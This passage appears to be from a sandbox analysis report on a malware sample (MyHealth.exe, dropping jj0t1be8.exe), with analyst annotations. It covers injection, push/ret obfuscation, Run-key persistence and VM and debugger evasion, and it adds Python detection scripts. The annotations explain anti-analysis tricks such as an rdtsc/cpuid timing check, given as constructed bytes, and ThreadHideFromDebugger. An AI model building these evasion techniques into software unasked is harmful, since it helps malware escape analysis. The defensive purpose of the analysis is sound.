 Source: Binary string: wntdll.pdbUGP source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1100285506.000000001F4BF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1102525562.000000001F3A0000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdb source: jj0t1be8.exe
 Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp
 None of these PDB paths belong to the sample; they are the symbol paths of Windows binaries (chkdsk.exe, systray.exe, WWAHost.exe, ntdll.dll and wscui.cpl). Their presence in MyHealth.exe and jj0t1be8.exe memory at addresses far from the processes' own images (0x90000, 0xD0000 and the 0x1F3A0000-0x1F5EF000 range) indicates that the sample maps copies of these system executables and of ntdll into its own processes, which fits the process-injection and sandbox-evasion entries in the matrix above. The only sample-specific fact here is the set of system binaries it chose: chkdsk.exe and systray.exe in the two jj0t1be8.exe processes, WWAHost.exe in MyHealth.exe.

#### Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 0_2_00401FEB push es; iretd 0_2_00401FF1
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 0_2_004013EC push 00402243h; ret 0_2_004013F6
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 0_2_004057B1 pushfd ; retf 0_2_004057B8
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000F63C9 push ecx; ret 2_3_000F63DC
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000ED81D push ecx; ret 2_3_000ED830
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000A6E44 push eax; retn 0007h 2_3_000A6E45
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F41DE2D push ecx; ret 16_2_1F41DE40
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3A92E1 push es; iretd 16_2_1F3A92E8
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3AA830 push es; iretd 16_2_1F3AA831
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F41DE2D push ecx; ret 17_2_1F41DE40
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3A92E1 push es; iretd 17_2_1F3A92E8
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3AA830 push es; iretd 17_2_1F3AA831
 Not all of these hits carry the same weight. "push es; iretd" and "pushfd; retf" are almost always the disassembler sweeping through data or into the middle of a longer instruction. The one worth following is "push 00402243h; ret" at 0_2_004013EC in the sample's own image: it is an unconditional jump to 0x00402243 written so that jmp/call-based control-flow recovery does not see the edge. The "push ecx; ret" and "push eax; retn 0007h" forms are indirect jumps through a register; the jj0t1be8.exe hits at 0x1F41DE2D and 0x1F3A92E1 fall in the address range the debug-symbol findings associate with a mapped ntdll copy and should be confirmed before being attributed to the payload.
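The following is an added example, not code from the report or from the sample: a linear sweep over raw x86 bytes that finds the two push/ret shapes the report lists (push imm32; ret and push r32; ret) and resolves the immediate target of the first form, which is what turns "push 00402243h; ret" back into "jmp 0x00402243". The sample bytes and the 0x004013E0 base are constructed; only the target 0x00402243 is taken from the finding at 0_2_004013EC.

```python
import struct
from typing import List, NamedTuple, Optional

# Register encoded in the one-byte "push r32" opcodes 0x50..0x57.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


class PushRet(NamedTuple):
    offset: int            # byte offset of the push inside the scanned buffer
    va: int                # virtual address of the push (base + offset)
    kind: str              # "push imm32; ret" or "push <reg>; ret"
    target: Optional[int]  # resolved jump target for the imm32 form, else None


def find_push_ret(code: bytes, base: int = 0) -> List[PushRet]:
    """Linear sweep for the two push/ret shapes listed in the report.

    68 imm32 C3 -> push imm32; ret : an unconditional jump to imm32 that hides
                                     the edge from jmp/call-based CFG recovery
    5x C3       -> push r32; ret   : an indirect jump through a register
    A linear sweep does not know where instructions start, so hits inside data
    or in the middle of longer instructions are possible; treat every hit as a
    lead to confirm in a disassembler, not as proof.
    """
    hits: List[PushRet] = []
    i, n = 0, len(code)
    while i < n:
        b = code[i]
        if b == 0x68 and i + 5 < n and code[i + 5] == 0xC3:
            imm = struct.unpack_from("<I", code, i + 1)[0]
            hits.append(PushRet(i, base + i, "push imm32; ret", imm))
            i += 6
            continue
        if 0x50 <= b <= 0x57 and i + 1 < n and code[i + 1] == 0xC3:
            hits.append(PushRet(i, base + i, f"push {REG32[b - 0x50]}; ret", None))
            i += 2
            continue
        i += 1
    return hits


# Constructed sample bytes (not taken from MyHealth.exe): a normal prologue,
# the obfuscated jump to 0x00402243 the report lists at 0_2_004013EC,
# a push ecx; ret, and a normal epilogue that must not match.
SAMPLE_CODE = bytes.fromhex(
    "55 8b ec "            # push ebp; mov ebp, esp
    "68 43 22 40 00 c3 "   # push 0x00402243; ret   (== jmp 0x00402243)
    "90 90 "               # nop; nop
    "51 c3 "               # push ecx; ret          (== jmp ecx)
    "8b 45 08 c9 c3 "      # mov eax, [ebp+8]; leave; ret
)
SAMPLE_BASE = 0x004013E0   # assumed load address of the sample buffer


def describe(hits: List[PushRet]) -> List[str]:
    """Human-readable lines in the report's own 'address mnemonic' style."""
    lines = []
    for h in hits:
        tgt = f" -> jmp {h.target:#010x}" if h.target is not None else ""
        lines.append(f"{h.va:08X} {h.kind}{tgt}")
    return lines


if __name__ == "__main__":
    for line in describe(find_push_ret(SAMPLE_CODE, SAMPLE_BASE)):
        print(line)
```

Run against a dumped .text section with the section's virtual address as `base`; the resolved targets are the places to start a second disassembly pass, since each one is a basic-block entry the first pass missed.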

#### Boot Survival:

 Creates an autostart registry key
 Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run F6H80RMXCN (recorded twice)
 Two things make this entry stand out even without the value data, which the report does not show: the writer is WWAHost.exe, a system binary that never registers Run values on its own and here hosts injected code, and the value name F6H80RMXCN is a random 10-character token. The dropped copy under C:\Program Files (x86)\G8prdul4\jj0t1be8.exe, itself a random 8-character directory and file name, is the probable target of the value; confirm by reading the value data from the registry of the analysis VM.
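A detection check for this persistence pattern, as an added example in Python that is not part of the report: it scores Sysmon EventID 13 (registry value set) records on three traits visible here, a Run value written by a Windows system binary, a random-looking value name, and value data pointing at an 8-character\8-character.exe path under Program Files. The events are constructed; the value data for F6H80RMXCN is an assumption, since the report does not show it, and the allow-list of system writers is an illustrative starting point rather than a complete one.

```python
import re
from typing import Dict, List

# One Sysmon EventID 13 (RegistryEvent: Value Set) record, as a SIEM would hand it over.
RunEvent = Dict[str, str]

RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(?:Run|RunOnce)\\(?P<name>[^\\]+)$",
    re.IGNORECASE,
)
# Value names like F6H80RMXCN: 8+ upper-case letters/digits with at least one digit.
RANDOM_NAME_RE = re.compile(r"^(?=.*\d)[A-Z0-9]{8,}$")
# Drop-path shape seen in this report: C:\Program Files (x86)\<8 chars>\<8 chars>.exe
RANDOM_INSTALL_RE = re.compile(
    r"\\Program Files( \(x86\))?\\[A-Za-z0-9]{8}\\[A-Za-z0-9]{8}\.exe", re.IGNORECASE)
SYSTEM_DIR_RE = re.compile(r"^[A-Z]:\\Windows\\", re.IGNORECASE)
# System-directory binaries that legitimately set Run values (assumed allow-list; extend per estate).
ALLOWED_SYSTEM_WRITERS = {"reg.exe", "regedit.exe", "msiexec.exe"}


def run_key_findings(event: RunEvent) -> List[str]:
    """Reasons to flag one registry-write event; an empty list means benign or not a Run value."""
    m = RUN_KEY_RE.search(event.get("TargetObject", ""))
    if m is None:
        return []
    reasons: List[str] = []
    image = event.get("Image", "")
    exe = image.rsplit("\\", 1)[-1].lower()
    if SYSTEM_DIR_RE.match(image) and exe not in ALLOWED_SYSTEM_WRITERS:
        reasons.append(f"written by Windows system binary {exe}; likely hosting injected code")
    name = m.group("name")
    if RANDOM_NAME_RE.match(name):
        reasons.append(f"random-looking value name {name}")
    if RANDOM_INSTALL_RE.search(event.get("Details", "")):
        reasons.append("value points to <8 chars>\\<8 chars>.exe under Program Files")
    return reasons


def triage(events: List[RunEvent]) -> Dict[str, List[str]]:
    """Map of flagged Run value names to the reasons they were flagged."""
    out: Dict[str, List[str]] = {}
    for ev in events:
        reasons = run_key_findings(ev)
        if reasons:
            out[RUN_KEY_RE.search(ev["TargetObject"]).group("name")] = reasons
    return out


# Constructed events. The first mirrors this report's finding; its Details
# (the value data) is assumed, since the report does not show it.
SAMPLE_EVENTS: List[RunEvent] = [
    {
        "Image": r"C:\Windows\SysWOW64\WWAHost.exe",
        "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\F6H80RMXCN",
        "Details": r'"C:\Program Files (x86)\G8prdul4\jj0t1be8.exe"',
    },
    {   # ordinary installer registering itself: must not be flagged
        "Image": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe",
        "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        "Details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
    {   # administrator using reg.exe: allow-listed system writer
        "Image": r"C:\Windows\System32\reg.exe",
        "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Backup",
        "Details": r"C:\Tools\backup.exe",
    },
    {   # explorer.exe does not set Run values on its own: flagged on the writer alone
        "Image": r"C:\Windows\explorer.exe",
        "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
        "Details": r"C:\Users\user\AppData\Roaming\updater.exe",
    },
    {   # unrelated registry write: ignored entirely
        "Image": r"C:\Windows\explorer.exe",
        "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
        "Details": "DWORD (0x00000001)",
    },
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```

The writer-image trait is the strongest of the three and survives renaming of the payload: a Run value set by WWAHost.exe, explorer.exe or another Windows binary is worth an alert on its own, because those processes only do this when something else is running inside them.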

#### Hooking and other Techniques for Hiding and Protection:

 Disables application error messages (SetErrorMode)

#### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements
 Contains functionality for execution timing, often used to detect debuggers
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F495595 rdtsc 16_2_1F495595
 This is a single rdtsc site, and it sits in the 0x1F3A0000-0x1F4BF000 range that the debug-symbol findings associate with a mapped ntdll copy; a timing check needs two reads and a comparison, so confirm in the disassembly that this read is paired and compared before treating it as deliberate evasion.
 Found large amount of non-executed APIs
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe API coverage: 4.6 % (reported for both jj0t1be8.exe processes)
 May sleep (evasive loops) to hinder dynamic analysis
 Sample execution stops while process was sleeping (likely an evasion)
 Source: C:\Windows\explorer.exe Last function: Thread delayed
 Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (both conhost.exe processes)
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
 Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
 Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
 Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
 Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW,
 Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
 Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@
 Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
 The explorer.exe strings are Hyper-V error messages from a system resource table and are present in any Windows 10 explorer process, so they carry no signal. The "Hyper-V RAW" strings in jj0t1be8.exe's heap are different in kind: "Hyper-V RAW" is the protocol name Windows reports for the Hyper-V socket provider in the Winsock catalog, so their most likely origin is the sample enumerating Winsock protocols while setting up networking, not a search for the hypervisor by name. Neither set is evidence of a VM check on its own.
 Queries a list of all running processes
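To show what a genuine RDTSC timing check looks like and how to tell it from an isolated read like the one reported, here is an added example (not code from the report or the sample) that sweeps raw x86 bytes for rdtsc (0F 31) and reports only pairs close enough to be a delta measurement. The sample bytes are constructed; the base address is an assumption chosen near the report's site.

```python
import re
from typing import List, Tuple

RDTSC = b"\x0f\x31"   # rdtsc: EDX:EAX = time-stamp counter


def find_rdtsc_sites(code: bytes, base: int = 0) -> List[int]:
    """Virtual addresses of every 0F 31 byte pair. This is a linear sweep, so
    data can produce false positives; confirm each site in a disassembler."""
    return [base + m.start() for m in re.finditer(re.escape(RDTSC), code)]


def find_timing_checks(code: bytes, base: int = 0, window: int = 64) -> List[Tuple[int, int]]:
    """Pairs of rdtsc sites within `window` bytes of each other.

    A VM/debugger timing check reads the counter twice around a short piece of
    work and compares the delta against a threshold: under single-stepping, or
    when a hypervisor traps the instructions in between, the delta is far
    larger than on bare metal. Two nearby reads are the signature of that
    pattern; an isolated rdtsc (as at 16_2_1F495595 in the report) may only be
    seeding a PRNG or feeding a performance counter.
    """
    sites = find_rdtsc_sites(code, base)
    return [(a, b) for a, b in zip(sites, sites[1:]) if b - a <= window]


# Constructed x86 bytes (not from the sample): a textbook delta check, then
# padding and a lone rdtsc that must not pair with anything.
SAMPLE_CODE = bytes.fromhex(
    "0f 31 "            # rdtsc              first read
    "8b f0 "            # mov esi, eax       keep the low 32 bits
    "0f a2 "            # cpuid              serialising; always exits to a hypervisor
    "0f 31 "            # rdtsc              second read
    "2b c6 "            # sub eax, esi       delta
    "3d 00 05 00 00 "   # cmp eax, 0x500     threshold
    "77 05 "            # ja  +5             -> "being analysed" branch
) + b"\x90" * 100 + bytes.fromhex("0f 31")
SAMPLE_BASE = 0x1F495500   # assumed base, chosen near the report's rdtsc site


if __name__ == "__main__":
    for a, b in find_timing_checks(SAMPLE_CODE, SAMPLE_BASE):
        print(f"timing check: rdtsc at {a:08X} and {b:08X} ({b - a} bytes apart)")
```

The cpuid between the two reads is the detail to look for when confirming a hit: it is the cheapest way for the sample to force a VM exit, so the measured delta is inflated under every mainstream hypervisor even when rdtsc itself is not trapped.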

#### Anti Debugging:

 Contains functionality to hide a thread from the debugger
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 15_2_02A50084 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 15_2_02A50084
 The second argument, 0x11, is the ThreadInformationClass value ThreadHideFromDebugger. Once it is set on a thread, that thread stops delivering debug events, so breakpoints and exceptions in it are never reported to an attached debugger. Two counters work from the debugger side: break on NtSetInformationThread and fail the call when the class is 0x11, or query the thread with NtQueryInformationThread(ThreadHideFromDebugger) to learn whether the flag is already set. Note that this call is made from a third jj0t1be8.exe process (index 15) at a low heap-range address, not from the ntdll range in which the other jj0t1be8.exe findings sit.
 Hides threads from debuggers